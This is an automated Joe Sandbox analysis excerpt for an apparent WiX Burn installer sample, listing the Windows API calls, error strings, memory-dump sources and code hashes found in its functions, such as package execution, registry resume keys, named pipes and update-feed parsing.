                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c3bda969b1c193f026f492eba210c2065cad66c4b3144e3c7fdbb395e9d3b81
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AC1D472900A15ABDF219F54C885BEE3AA8FF04714F148179FD0DEE24AEB74D950CBA1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,00000410), ref: 008A8161
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 008A817C
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 008A821F
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,000002D8,008AB518,00000000), ref: 008A825E
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 008A82B1
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,008AB518,000000FF,true,000000FF), ref: 008A82CF
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 008A8307
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 008A844B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                                                                                                                                                  • String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
                                                                                                                                                                                                                                                                                                  • API String ID: 1825529933-3037633208
                                                                                                                                                                                                                                                                                                  • Opcode ID: dd3e7b3b88d3a07824564b8a57d66befc84d8a37a8bf279a5362b8906695ed0b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 539e27269eaf5f40c27651eb26537492f3a0232592d13483a6fd7e06337b4d48
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd3e7b3b88d3a07824564b8a57d66befc84d8a37a8bf279a5362b8906695ed0b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DB19131604606EBEB209F58CC81F5A7BB6FB46730F214659F925EBAD1DB74E840CB24
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,rel,000000FF,?,?,?,00000000), ref: 008A7857
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,href,000000FF), ref: 008A787C
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,length,000000FF), ref: 008A789C
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 008A78CF
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,type,000000FF), ref: 008A78EB
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A7916
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A798D
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 008A79D9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Compare$Free
                                                                                                                                                                                                                                                                                                  • String ID: comres.dll$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0087E2AF: LoadBitmapW.USER32(?,00000001), ref: 0087E2E5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0087E2AF: GetLastError.KERNEL32 ref: 0087E2F1
                                                                                                                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0087E429
                                                                                                                                                                                                                                                                                                  • RegisterClassW.USER32(?), ref: 0087E43D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0087E448
                                                                                                                                                                                                                                                                                                  • UnregisterClassW.USER32(WixBurnSplashScreen,?), ref: 0087E54D
                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 0087E55C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ClassErrorLastLoad$BitmapCursorDeleteObjectRegisterUnregister
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create window.$Failed to load splash screen.$Failed to register window.$Unexpected return value from message pump.$WixBurnSplashScreen$splashscreen.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,00000000,?,0088BC85,00000001), ref: 00889E46
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0088BC85,00000001), ref: 00889FB6
                                                                                                                                                                                                                                                                                                  • GetExitCodeThread.KERNEL32(00000001,00000000,?,0088BC85,00000001), ref: 00889FF6
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0088BC85,00000001), ref: 0088A000
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to execute MSP package., xrefs: 00889ECB
                                                                                                                                                                                                                                                                                                  • Invalid execute action., xrefs: 0088A056
                                                                                                                                                                                                                                                                                                  • Failed to execute dependency action., xrefs: 00889F36
                                                                                                                                                                                                                                                                                                  • Failed to execute EXE package., xrefs: 00889E7D
                                                                                                                                                                                                                                                                                                  • Failed to execute MSI package., xrefs: 00889EA6
                                                                                                                                                                                                                                                                                                  • Failed to load compatible package on per-machine package., xrefs: 00889F5C
                                                                                                                                                                                                                                                                                                  • Cache thread exited unexpectedly., xrefs: 0088A047
                                                                                                                                                                                                                                                                                                  • Failed to execute package provider registration action., xrefs: 00889F17
                                                                                                                                                                                                                                                                                                  • Failed to execute compatible package action., xrefs: 00889F73
                                                                                                                                                                                                                                                                                                  • Failed to execute MSU package., xrefs: 00889EFB
                                                                                                                                                                                                                                                                                                  • Failed to get cache thread exit code., xrefs: 0088A031
                                                                                                                                                                                                                                                                                                  • Failed to wait for cache check-point., xrefs: 00889FE7
                                                                                                                                                                                                                                                                                                  • apply.cpp, xrefs: 00889FDD, 0088A027
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A3AF1: GetVersionExW.KERNEL32(?,?,00000000,?), ref: 008A3B3E
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,008B0D10,00020006,00000000,?,00000000,00000000,00000000,?,00000000,00000001,00000000,00000000), ref: 0086F440
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A14A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,0086F28D,008B0D10,Resume,00000005,?,00000000,00000000,00000000), ref: 008A14BB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseValueVersion
                                                                                                                                                                                                                                                                                                  • String ID: "%ls" /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$burn.runonce$registration.cpp
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(771A8FB0,00000002,00000000), ref: 0088CC9D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00874D8D: UuidCreate.RPCRT4(?), ref: 00874DC0
                                                                                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,08000000,00000000,00000000,?,00882401,?,?,00000000,?,?,?), ref: 0088CD7B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,?,?,?,?), ref: 0088CD85
                                                                                                                                                                                                                                                                                                  • GetProcessId.KERNEL32(00882401,?,?,00000000,?,?,?,?), ref: 0088CDBD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: lstrlenW.KERNEL32(?,?,00000000,?,008AB500,?,00000000,?,0086452F,?,008AB500), ref: 008754FD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: GetCurrentProcessId.KERNEL32(?,0086452F,?,008AB500), ref: 00875508
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0086452F,?,008AB500), ref: 0087553F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: ConnectNamedPipe.KERNEL32(?,00000000,?,0086452F,?,008AB500), ref: 00875554
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: GetLastError.KERNEL32(?,0086452F,?,008AB500), ref: 0087555E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: Sleep.KERNEL32(00000064,?,0086452F,?,008AB500), ref: 00875593
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0086452F,?,008AB500), ref: 008755B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0086452F,?,008AB500), ref: 008755D1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: WriteFile.KERNEL32(?,0086452F,008AB500,00000000,00000000,?,0086452F,?,008AB500), ref: 008755EC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008754DC: WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,0086452F,?,008AB500), ref: 00875607
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0A28: WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00864F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 008A0A38
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0A28: GetLastError.KERNEL32(?,?,00864F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 008A0A46
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,0088CBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 0088CE41
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,0088CBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 0088CE50
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,000000FF,00000000,?,0088CBEF,?,?,?,?,?,00000000,?,?,?), ref: 0088CE67
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to allocate embedded command., xrefs: 0088CD54
                                                                                                                                                                                                                                                                                                  • Failed to process messages from embedded message., xrefs: 0088CE04
                                                                                                                                                                                                                                                                                                  • Failed to create embedded pipe., xrefs: 0088CD27
                                                                                                                                                                                                                                                                                                  • Failed to wait for embedded executable: %ls, xrefs: 0088CE24
                                                                                                                                                                                                                                                                                                  • Failed to create embedded pipe name and client token., xrefs: 0088CD00
                                                                                                                                                                                                                                                                                                  • Failed to wait for embedded process to connect to pipe., xrefs: 0088CDDF
                                                                                                                                                                                                                                                                                                  • burn.embedded, xrefs: 0088CD38
                                                                                                                                                                                                                                                                                                  • Failed to create embedded process at path: %ls, xrefs: 0088CDB3
                                                                                                                                                                                                                                                                                                  • embedded.cpp, xrefs: 0088CDA6
                                                                                                                                                                                                                                                                                                  • %ls -%ls %ls %ls %u, xrefs: 0088CD40
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 875070380-3803182736
                                                                                                                                                                                                                                                                                                  • Opcode ID: 29203672484ce5b633b7d0a22899ab9861e2cd82f7b9ea04659bb7b75b18a3e7
                                                                                                                                                                                                                                                                                                  • Instruction ID: fbc808df950bbaae1b0a3cc1ee95c7bc6b7b3aa90efe99139ad6a9fe2821f7ba
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29203672484ce5b633b7d0a22899ab9861e2cd82f7b9ea04659bb7b75b18a3e7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7516E72D4022DBBDF12AAA8DC06FDEBBB8FB04711F114125FA04F6255D7749A409BE1
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,msi.dll,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,?,008A8468,00000001,?), ref: 008A7F9E
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,002E0069,000000FF,?,008A8468,00000001,?), ref: 008A7FB9
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,002E0069,000000FF,?,008A8468,00000001,?), ref: 008A7FD4
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,algorithm,000000FF,?,000000FF,?,008A8468,00000001,?), ref: 008A8040
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,md5,000000FF,?,000000FF,?,008A8468,00000001,?), ref: 008A8064
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,sha1,000000FF,?,000000FF,?,008A8468,00000001,?), ref: 008A8088
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,sha256,000000FF,?,000000FF,?,008A8468,00000001,?), ref: 008A80A8
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(006C0064,?,008A8468,00000001,?), ref: 008A80C3
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString$lstrlen
                                                                                                                                                                                                                                                                                                  • String ID: algorithm$apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$msi.dll$name$sha1$sha256
                                                                                                                                                                                                                                                                                                  • API String ID: 1657112622-2492263259
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5fdf0c126b41e951381c8c90bd20cd35491e142d5eac4c1a921296b1ce5524f7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 640132b8ae647b3b5cfa5ae9f9eddf16177618ca352b107190c0ce89e466a681
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fdf0c126b41e951381c8c90bd20cd35491e142d5eac4c1a921296b1ce5524f7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C516231648A12FBEB205F54CC45F167A65FB16730F204314FA35EEAE1DBB5E8548BA0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0086A0B6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Open@16
                                                                                                                                                                                                                                                                                                  • String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
                                                                                                                                                                                                                                                                                                  • API String ID: 3613110473-2134270738
                                                                                                                                                                                                                                                                                                  • Opcode ID: 67414430a9fb632e1dcb9f49db1e1a4e54698126c66f2a9974de120ed64fcb88
                                                                                                                                                                                                                                                                                                  • Instruction ID: 583c5c0f6d5dc572d40b2556d72bb7f342910ffac0d8ea27b2a1aa0de9c34ec6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67414430a9fb632e1dcb9f49db1e1a4e54698126c66f2a9974de120ed64fcb88
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D661F432D40119FBDB29AAA8CD95EAE7B78FB06714F120065F901FA741D232DE409F93
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0086EE4C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: GetProcessHeap.KERNEL32(?,000001C7,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863960
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0086394F: RtlAllocateHeap.NTDLL(00000000,?,00862274,000001C7,00000001,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863967
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0086EE04
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Filename, xrefs: 0086ED7F
                                                                                                                                                                                                                                                                                                  • Failed to get next node., xrefs: 0086EEB3
                                                                                                                                                                                                                                                                                                  • Failed to get @Path., xrefs: 0086EE95
                                                                                                                                                                                                                                                                                                  • Failed to allocate memory for software tag structs., xrefs: 0086ED4B
                                                                                                                                                                                                                                                                                                  • Failed to select software tag nodes., xrefs: 0086ECEE
                                                                                                                                                                                                                                                                                                  • registration.cpp, xrefs: 0086ED41
                                                                                                                                                                                                                                                                                                  • Regid, xrefs: 0086ED9A
                                                                                                                                                                                                                                                                                                  • Failed to get software tag count., xrefs: 0086ED13
                                                                                                                                                                                                                                                                                                  • Failed to get @Regid., xrefs: 0086EE9F
                                                                                                                                                                                                                                                                                                  • Failed to convert SoftwareTag text to UTF-8, xrefs: 0086EE81
                                                                                                                                                                                                                                                                                                  • Failed to get @Filename., xrefs: 0086EEA9
                                                                                                                                                                                                                                                                                                  • Failed to get SoftwareTag text., xrefs: 0086EE8B
                                                                                                                                                                                                                                                                                                  • Path, xrefs: 0086EDB2
                                                                                                                                                                                                                                                                                                  • SoftwareTag, xrefs: 0086ECCD
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FreeHeapString$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$registration.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 336948655-1068704183
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8cf02a440813095d3b2315a10cff749383baa03c589af7ed9200ed642a1234ef
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4eb29738a3705e1fe8aafefd7f20d040200531e483183b24ab938dc9ae45e6f9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8cf02a440813095d3b2315a10cff749383baa03c589af7ed9200ed642a1234ef
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1518039E0172ABBDB219F98C895EAEBBA8FF04750F524169F911EB340C775DE008791
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 00874B84
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00874B92
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00874BB6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateErrorFileLastSleep
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$feclient.dll$pipe.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 408151869-3212458075
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0b54f8a9d2faad1a26bdf16ea905df0556caf07a615d6c4a70c8bb1a9a44d608
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6e3626cd51d47b659a0ed064466c3b77f0fa85cf8bb3f87aa278f93974d2805b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b54f8a9d2faad1a26bdf16ea905df0556caf07a615d6c4a70c8bb1a9a44d608
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6417632D82636BBEB2216E48D06F9A7A64FF11730F129221FE18FB295D774DD0086D5
                                                                                                                                                                                                                                                                                                  APIs
